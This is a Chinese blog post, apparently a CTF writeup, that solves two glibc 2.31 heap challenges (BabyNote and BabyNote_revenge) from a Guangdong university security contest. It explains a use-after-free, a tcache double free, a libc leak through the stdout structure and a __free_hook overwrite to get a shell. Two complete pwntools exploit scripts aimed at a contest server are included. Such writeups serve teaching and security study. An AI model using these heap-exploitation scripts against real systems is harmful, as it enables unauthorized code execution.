第一届广东省大学生网络安全攻防大赛PWN Writeup

最新推荐文章于 2024-10-09 10:59:40 发布
最新推荐文章于 2024-10-09 10:59:40 发布
阅读量3.6k 收藏 7
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43921239/article/details/117228505
版权
本文介绍了两道基于glibc2.31的无输出堆题目的解决过程,主要涉及堆块管理、UAF漏洞利用、libc地址泄露和system提权。在BabyNote题目中,通过tcachedouble和scanf触发malloc_consolidate获取main_arena地址,然后修改堆布局以泄露libc地址并利用__free_hook获取shell。在BabyNote_revenge中,尽管_gift_函数有所变化,但利用方式与前一题相似,主要区别在于libc地址的计算。文章详细阐述了调试过程中遇到的问题及解决方案,并提供了exploit代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

两个题目都是无输出堆题,最近一次比赛在 nepctf 遇到:https://www.mrskye.cn/archives/bdb75c49/#sooooeasy

思路方法概述:https://www.jianshu.com/p/fe28639e406e

BabyNote

题目是基于 glibc 2.31 的菜单堆题。

漏洞出现在 free 之后没有置零指针导致的 UAF :

image-20210524162332431

程序没有输出函数,倒是有一个提示的函数 gift 函数,输出堆地址最低两个字节,没用明白,到最后也不关他的事情。

思路

  1. 利用 tcache double 和 scanf 输出长字符串触发 malloc_consolidate 获取 main_arena 地址

  2. 爆破倒数第四个数字,将堆分配到 stdout 结构体上,修改 flag 和 write_base 地址泄露出 libc 地址

  3. 利用 tcache dup get shell

遇到的问题就是直接之前 libc 2.23 的 payload 去打的话没有回显出 libc 地址,原来的 payload :

p64(0x0FBAD1887) +p64(0)*3 + p8(0x88)

flag 这么设置绕过检查没有问题,问题是将 write_base 最低值字节修改为 0x88 了,而 libc 2.31 中 write_ptr 最低位是 0x23

image-20210524170155561

导致起始地址比结束地址大,而没有东西输出。还有就是调试断点位置设置问题 ,导致一直以为是修改不成功的原因。断点一开始是打在修改后下一次进入主菜单的时候,由于每次输出都会刷新 stdout 结构体部分指针,导致一直以为没修改成功。正确应该在 read 打断点,然后 n 跳一步查看是否成功修改结构体。

EXP

from pwn import *
# context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']



def add(content):
    p.sendlineafter(">>> ",str(1))
    p.sendafter("Input Content:\n",content)
def gift():
    p.sendlineafter(">>> ",str(666))
def delete(id):
    p.sendlineafter(">>> ",str(3))
    p.sendlineafter("Input ID:\n",str(id))
def edit(id,content):
    p.sendlineafter(">>> ",str(2))
    p.sendlineafter("Input ID:\n",str(id))
    p.sendafter("Input Content:\n",content)

def exp():
    add('a'*58)#0
    add('a'*58)#1
    add('a'*58)#2
    for _ in range(8):
        delete(0)
        edit(0,'b'*0x58)
    edit(0,'\x00'*0x10)
    p.sendlineafter(">>> ",'1'*0x450)
    edit(0,'\xa0\x66')

    stdout_offset = libc.symbols['_IO_2_1_stdout_']
    log.info("stdout_offset:"+hex(stdout_offset))

    add('c'*0x8)#3
    # gdb.attach(p,"b *$rebase(0x1392)")
    # raw_input()
    add(p64(0x0FBAD1887) +p64(0)*3 + p8(0x00))#4
    libc_addr = u64(p.recvuntil('\x7f',timeout=1)[-6:].ljust(8,'\x00'))-(0x7fbe678e5980-0x7fbe676fa000)#- (0x7ffff7fac980-0x7ffff7dc1000)
    log.info("libc_addr:"+hex(libc_addr))

    free_hook = libc_addr+libc.sym['__free_hook']
    system_addr = libc_addr+libc.sym['system']
    binsh_str = libc_addr+libc.search('/bin/sh').next()

    delete(1)
    edit(1,p64(free_hook)*2)
    add('/bin/sh\x00')
    add(p64(system_addr))
    delete(1)

    p.interactive()


# p = process("./BabyNote",env={'LD_PRELOAD':'./libc-2.31.so'})
# libc = ELF("./libc-2.31.so")
# exp()

if __name__ == '__main__':
    # p = process("./BabyNote",env={'LD_PRELOAD':'./libc-2.31.so'})
    # libc = ELF("./libc-2.31.so")
    # p = process("./BabyNote")
    # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p = remote("8.134.14.168", 10000)
    libc = ELF("./libc-2.31.so")
    while True:
        try:
            exp()
            exit(0)
        except:
            p.close()
            p = remote("8.134.14.168", 10000)
            # p = process("./BabyNote",env={'LD_PRELOAD':'./libc-2.31.so'})

WX20210523-133922

BabyNote_revenge

程序啥的都和上一题一样,就是 gift 函数变了,里面换成个沙箱的指令,没仔细看。因为漏洞和上一题一样,用上一题的脚本改下偏移就直接跑出来了。

EXP

from pwn import *
# context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']



def add(content):
    p.sendlineafter(">>> ",str(1))
    p.sendafter("Input Content:\n",content)
def gift():
    p.sendlineafter(">>> ",str(666))
def delete(id):
    p.sendlineafter(">>> ",str(3))
    p.sendlineafter("Input ID:\n",str(id))
def edit(id,content):
    p.sendlineafter(">>> ",str(2))
    p.sendlineafter("Input ID:\n",str(id))
    p.sendafter("Input Content:\n",content)

def exp():
    add('a'*58)#0
    add('a'*58)#1
    add('a'*58)#2
    for _ in range(8):
        delete(0)
        edit(0,'b'*0x58)
    edit(0,'\x00'*0x10)
    p.sendlineafter(">>> ",'1'*0x450)
    # edit(0,'\xa0\xa6')
    edit(0,'\xa0\x66')


    # stdout_offset = libc.symbols['_IO_2_1_stdout_']
    # log.info("stdout_offset:"+hex(stdout_offset))

    add('c'*0x8)#3
    add(p64(0x0FBAD1887) +p64(0)*3 + p8(0x00))#4
    libc_addr = u64(p.recvuntil('\x7f',timeout=1)[-6:].ljust(8,'\x00'))-(0x7f61c5525980-0x7f61c533a000)#(0x7ffff7f59980-0x7ffff7d6e000)
    #libc_addr:0x7f1eb42b5980
    log.info("libc_addr:"+hex(libc_addr))
    # gdb.attach(p,"b *$rebase(0x13E2)")
    # raw_input()
    free_hook = libc_addr+libc.sym['__free_hook']
    log.info("free_hook:"+hex(free_hook))
    system_addr = libc_addr+libc.sym['system']
    binsh_str = libc_addr+libc.search('/bin/sh').next()

    delete(1)
    edit(1,p64(free_hook)*2)
    add('/bin/sh\x00')
    add(p64(system_addr))


    
    delete(1)

    p.interactive()


# p = process("./BabyNote_revenge",env={'LD_PRELOAD':'./libc-2.31.so'})
# libc = ELF("./libc-2.31.so")
# exp()

if __name__ == '__main__':
    # p = process("./BabyNote_revenge",env={'LD_PRELOAD':'./libc-2.31.so'})
    # libc = ELF("./libc-2.31.so")
    # p = process("./BabyNote_revenge")
    # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p = remote("8.134.14.168", 10001)
    libc = ELF("./libc-2.31.so")
    while True:
        try:
            exp()
            exit(0)
        except:
            p.close()
            p = remote("8.134.14.168", 10001)
            # p = process("./BabyNote_revenge",env={'LD_PRELOAD':'./libc-2.31.so'})
            # p = process("./BabyNote_revenge")

WX20210523-133936

SkYe231_
关注
2024第八届全国职工职业技能大赛“网络与信息安全管理员”河北省预选拔赛解析
Aluxian_的博客
08-03 1383
2024第八届全国职工职业技能大赛“网络与信息安全管理员”某省选拔赛解析
广东第一届网络安全知识竞赛比赛CTF题做题记录
cadandme的博客
05-23 2207
今天进行的CTF比赛,跟队友一起做出了几道CTF题,挑几道签到题记录一下,主要记录一下自己参加比赛的点滴,讲解不全,请见谅。 第一题:小猪佩奇,看的我眼花 用stegsolve打开查看,眼神好的立马就可以发现背景有二维码碎片,一共有25张图,25张碎片需要拼接。大佬们都是脚本跑出来的,但小白的我只能苦哈哈的抠图。在队友的帮忙下,漫长的扣图后产品如下: 扫出来后是密文,base解码两次后为猪圈密码,小猪佩奇也是一个提示吧。 第二题 :misc签到题 流量分析,给了一个流量包, 在kali中文件分离后在一个压
第二届广东大学生网络安全攻防大赛 个人向Write Up
hfv13的博客
05-22 1942
第二届广东大学生网络安全攻防大赛 个人向Write Up
广东大学生网络攻防大赛-WriteUp(非官方)】Web | easy_ctf
ZXW_NUDT的博客
05-23 605
def mysort(s): dic={} for i in s: if i not in dic: dic[i]=1 else: dic[i]+=1 a=sorted(dic.items(),key=lambda x:x[1],reverse=False) print(a) m="" for i in a: m+=i[0]
广东大学生网络攻防大赛-WriteUp(非官方)】Pwn | jmp_rsp
ZXW_NUDT的博客
05-23 504
from pwn import * from ctypes import * from LibcSearcher import * context.log_level = 'debug' context.arch='amd64' io=remote('47.106.122.102',48752) rl=lambda a=False :io.recvline(a) ru=lambda a,b=True :io.recvuntil(a,b) rn=lambda x :io.sendline(x) sn=lamb
广东外语外贸大学第三届网络安全大赛Writeup
SkYe's Blog
12-09 1035
广东外语外贸大学第三届网络安全大赛Writeup 官方WP:https://github.com/gwht/2019GWCTF/tree/master/ Msic math 是男人就下150层嘛,也就是答对150次计算题就返回 flag 嘛。这道题与 pwnable.kr 的一道题很像。题目有作答时间限制,所以用脚本跑吧。可能是人品问题,跑了很多次,最好的就是回答到 147 之后就链接断了(垃...
广东大学生网络安全攻防大赛题目附件-剩下的)
05-25
该文件包含了比赛上本人没做出来的题目的附件
广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
南京邮电大学第十一届网络攻防大赛开源题目_NCTF2022.zip
09-01
南京邮电大学第十一届网络攻防大赛开源题目_NCTF2022.zip文件中的NCTF2022-main,是作为南京邮电大学举办的网络攻防大赛中的比赛题目。NCTF,即Network Challenge Tournament for Future,网络攻防挑战赛,是面向...
CTF--2016XDCTF全国网络安全大赛之reverse2
关注互联网安全的小虾米一枚
03-13 6892
2016中国-XDCTF全国网络安全大赛 第七届全国网络安全大赛(XDCTF2016)暨第五届陕西省网络安全技能大赛
2022年第三届全国大学生网络安全精英赛
liuruo11000的博客
10-25 6877
为了使大学生更全面的掌握网络安全知识,进一步提升网络安全意识和网络安全技能,深入加强信息化环境下企业信息安全保护能力,使优秀的学生,在竞争中展示自己,并为各个学校展示自身的教学实力提供平台,在中国信息安全测评中心指导下,国家网络空间安全人才培养基地拟于2022年10-12月举办“2022年第三届全国大学生网络安全精英赛”,使全国广大在校学生在信息意识普及和知识技能提升方面更好地展示自身能力,为其顺利进入工作岗位打下良好的基础。介绍各承办、协办单位,冠名企业领导发言,参赛选手、指导教师代表发言。
2023羊城杯决赛 pwn
qq_62172019的博客
09-18 491
因为库版本是2.23没有对top块大小做检查所以可以正应了题目的名字(house of force)发现第一次申请一个巨大的块泄露地址,第二次可以申请小于0x30的堆块修改top块的大小。第三次申请把malloc_got拿出来写上system第四次申请就成功getshell。注意:直接覆盖成后门地址会因为对齐出问题所以应该跳过push命令以后。没有开pie 堆地址存在固定位置上可以使用unlink攻击。-7的位置上面存在函数返回地址。成功getshell。成功getshell。成功getshell。
NSSCTF(MISC)—[广东省大学生攻防大赛 2021]你看看是什么
最新发布
hzhfhsq的博客
10-09 189
用010查看解码。
2018上海大学生网络安全赛 misc 92 wp
豆傻小饼干随记
11-08 1234
首先得到题目,看到16进制文件,在第86--100行处有多处相同的字符串:5365676d656e74696e67206c696e65,字符串解码可得:Segmenting line,中文意思为分隔行可知上下分为两部分 第二步,查看第一行字符串可得:25448494D0000000A0A1A0D074E40598,这是png文件格式单行逆序输出,编写程序提取图片(代码略,简单的python逆序写...
首届Pwn2Own 汽车大赛落幕,Master of Pwn 诞生
smellycat000的专栏
01-26 481
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士为期三天(2024年1月24日到26日)的首届 Pwn2Own 汽车大赛落下帷幕。主办方共发放1323750美元的赏金,参赛选手共发现49个唯一 0day 漏洞。Synacktiv 团队以45万美元的赏金、50个积分点的成绩成功摘得Master of Pwn(破解冠军)的桂冠。大赛的目标和奖金可见:首届Pwn2Own 汽车大赛目标和奖金公布第一天...
第三届上海大学生网络安全大赛 junkcode writeup
ACdream
02-05 2181
这个题题目名字是junkcode,给人的第一反应是要去除花指令 ~ ~ ~其实做题的过程和花指令并没有半毛钱关系,只是干扰了IDA的使用,从而无法进行静态分析而已因为重点思路总是习惯性的放在了去花上,导致了其实很简单的算法,没有跟踪到数据的起始和目标节点,浪费了很多分析时间。首先运行,看到error in open flag.打开IDA,静态分析这就是花指令的作用,看起来心烦,不知道程序在干什么。...
Pwn】详细介绍
cz88888888666的博客
03-15 1606
通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权,一旦攻击者。是一个俚语,起源于电子游戏社区,经常在英语中用作网络或电子游戏文化中的一个术语,最初,这个词是。一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件、或者制造更广泛的破坏。任务经常涉及在一个受限制的环境中寻找和利用漏洞来访问受保护的资源或系统。这个词的意义被扩展到其他领域,尤其是计算机安全,在网络安全语境中,另一个玩家,那通常意味着他们在竞技中显著地优于对手。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值